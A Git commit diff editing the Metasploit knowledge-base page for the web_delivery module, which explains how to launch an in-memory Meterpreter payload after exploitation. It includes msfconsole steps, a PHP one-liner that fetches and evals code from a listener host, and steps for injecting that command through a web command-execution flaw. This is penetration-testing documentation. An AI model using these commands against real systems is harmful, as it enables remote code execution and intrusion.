Merge pull request #39 from tdoan-r7/mod_doc_cmd

MS-1196 Minor edits to the kb for the web_delivery module
bug/bundler_fix
sinn3r 2016-03-22 12:34:27 -05:00
commit 9aa5f4f03a
1 changed files with 17 additions and 24 deletions

View File

@ -1,31 +1,26 @@
As a web server, web_delivery provides a great way to deliver a payload during post exploitation, As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.
with the intention to stay stealthy because the payload does not touch the disk.
Currently, web_delivery supports three different languages for delivery: Python, PHP, and Currently, web_delivery supports three different languages for delivery: Python, PHP, and
Powershell. You should be able to tell which one you can use based on the target environment Powershell. You should be able to tell which one you can use based on the target environment
you are in. you are in.
For example: if you have gained access through a PHP application, then it's safe to assume you can For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.
use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to
say the target supports Powershell.
## Verification Steps ## Verification Steps
To be able to use web_delivery, you must gain access to the target machine first, with the ability To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.
to execute either the Python, or PHP, or Powershell interpreter.
At that point, you would use web_delivery similar to the following example: At that point, you would use the web_delivery module like in the following example:
1. Start msfconsole 1. Start msfconsole
2. Do: ```use exploit/multi/script/web_delivery``` 2. Run: ```use exploit/multi/script/web_delivery```
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options) 3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target) 4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Do: ```set LHOST IP``` (The IP the payload should connect back to) 5. Run: ```set LHOST IP``` (The IP the payload should connect back to)
6. Do: ```run``` 6. Do: ```run```
7. At this point, a handler is up for that payload. And the module should instruct you to execute 7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
a command. 8. Copy the command. Depending on your pentesting scenario, you can either inject the
8. Copy the command. Depending on your pentesting scenario, typically you can either inject the command and get code execution, or run it from the target's shell and get a session:
command and get code execution, or run it from the target's shell, and get a session:
``` ```
msf exploit(web_delivery) > run msf exploit(web_delivery) > run
@ -46,14 +41,13 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
**Python** **Python**
Python is a fairly popular language, especially on unix-based systems. For example, it comes with Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.
Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3.
**PHP** **PHP**
PHP is a fairly popular language for web servers, especially Apache. PHP is a fairly popular language for web servers, especially Apache.
**Powershell/win** **Powershell/Windows**
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
@ -68,16 +62,15 @@ web_delivery would work nicely for a web application with a command execution vu
One way to approach this would be: One way to approach this would be:
1. Start exploit/multi/script/web_delivery 1. Start exploit/multi/script/web_delivery
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that 2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
results in arbitrary code execution.
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session. 3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
**Shell upgrade** **Shell upgrade**
web_delivery is also useful to upgrade a shell type payload to a meterpreter one. web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.
Here's how that can be done: Here's how that can be done:
1. Start exploit/multi/script/web_delivery that generates/ 1. Start exploit/multi/script/web_delivery that generates/
2. On msfconsole, interact with the shell, and copy/pate the command. 2. In msfconsole, interact with the shell, and copy/paste the command.
3. You should get a meterpreter session. 3. You should get a Meterpreter session.